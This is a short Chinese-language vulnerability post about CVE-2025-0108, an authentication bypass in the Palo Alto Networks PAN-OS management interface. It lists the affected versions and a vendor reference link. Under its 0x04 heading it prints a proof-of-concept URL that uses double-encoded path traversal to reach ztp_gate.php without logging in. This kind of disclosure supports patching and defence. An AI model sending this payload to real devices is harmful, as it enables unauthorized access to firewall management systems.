CVE-2025-0108｜Palo Alto Networks PAN-OS管理界面认证绕过漏洞（POC）

0x00 前言

派拓网络（Palo Alto Networks）是一家网络安全公司，总部位于美国加利福尼亚州圣克拉拉市。公司的核心产品为“下一代防火墙”（Next-Generation Firewall）平台，提供网络活动的可视化能力，可基于应用（App-ID）、用户（User-ID）与内容（Content-ID）进行网络活动的精细化控制，同时提供基于云的安全服务（GlobalProtect与WildFire）来拓展防火墙的安全性。

0x01 漏洞描述

Palo Alto Networks PAN-OS管理界面存在认证绕过漏洞，未经身份验证的攻击者可通过网络访问管理界面，进而绕过身份验证机制。

0x02 CVE编号

CVE-2025-0108

0x03 影响版本

PAN OS 11.2 < 11.2.4-h4

PAN OS 11.1 < 11.1.6-h1

PAN OS 10.2 < 10.2.13-h3

PAN OS 10.1 < 10.1.14-h9

0x04 漏洞详情

POC：

https://xx.xx.xx.xx/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

0x05 参考链接

https://security.paloaltonetworks.com/CVE-2025-0108